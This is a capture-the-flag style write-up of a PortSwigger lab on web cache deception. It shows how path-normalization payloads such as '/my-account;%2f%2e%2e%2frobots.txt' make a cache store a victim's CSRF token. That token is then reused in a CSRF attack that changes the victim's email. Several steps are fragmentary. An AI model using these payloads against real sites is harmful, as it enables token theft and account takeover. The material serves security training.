
Web Cache Deception – Exploiting Exact-Match Cache Rules (Expert Level)
Prerequisites
To complete this lab, ensure you have:
- A PortSwigger Web Security Academy account
- Burp Suite (Community or Professional edition)
- A proxy extension like FoxyProxy configured in your browser
- JavaScript enabled in your browser
- Familiarity with web caching mechanisms, HTTP, HTML, and CSRF concepts
Labs Covered
This write-up focuses on the following EXPERT-level lab from the PortSwigger Web Security Academy:
Lab: Exploiting exact-match cache rules for web cache deception This lab demonstrates how attackers can abuse exact-match cache rules to trick caches into storing sensitive resources.
Lab Description
Overview: Exploiting File Name Cache Rules
Certain resources like robots.txt
, favicon.ico
, and index.html
are often cached using exact-match filename rules. An attacker can exploit discrepancies in how URLs are interpreted by the cache vs the origin server to expose or cache sensitive user data.
Detecting Normalization Discrepancies
To understand whether the cache and origin server treat paths differently:
- Try requests like
/aaa%2f%2e%2e%2frobots.txt
- Observe caching headers (
X-Cache: hit/miss
)
If the origin doesn’t normalize paths, but the cache does, this can be abused.
Exploiting the Lab
Step 1 – Identify Sensitive Endpoints
Login with credentials wiener:peter
and change your email address.
Observe the CSRF token in /my-account
.
Step 2 – Investigate Path Discrepancies
Test variants of /my-account
using unusual path syntax:
/my-account/hanzala
/my-accounthanzala
Run Intruder tests using various delimiters like ;
, ?
, %2f
.
Observe responses. Note which variants return 200.
Step 3 – Check Caching Behavior
Requests such as:
/my-account;hanzala.js
/my-account?hanzala.js
Return 200 but show no cache.
Step 4 – Test Normalization Discrepancy
- Try
/aa/..%2fmy-account
→ 404 Origin doesn’t resolve dot-segments.
Now test /robots.txt
:
- First request shows
X-Cache: miss
- Second request shows
X-Cache: hit
(indicates cache)
Try /aaa/..%2frobots.txt
:
Step 5 – Poison the Cache
Try a crafted request:
/my-account;%2f%2e%2e%2frobots.txt
1st Request:
Resend:
The response includes sensitive data (your CSRF token), now cached.
Step 6 – Deliver Exploit to Victim
On the exploit server:
<img src="/my-account;%2f%2e%2e%2frobots.txt?wc" />
When the administrator visits this image:
- They load your
/my-account;%2f%2e%2e%2frobots.txt?wc
path - Their CSRF token gets stored in cache
Verify this by resending the same request:
Step 7 – Craft and Send CSRF Exploit
In Burp, copy the request to change email:
Replace your token with the stolen one from cache.
Generate CSRF HTML:
Copy HTML and paste into exploit body:
Deliver the payload again:
Confirm lab is solved.
Conclusion
This lab demonstrates how a mismatch between the origin and cache handling of exact-match filenames can be exploited to store and reuse user-specific content. By targeting cacheable endpoints such as robots.txt
, and tricking the cache into storing personalized responses, an attacker can stage highly effective CSRF attacks.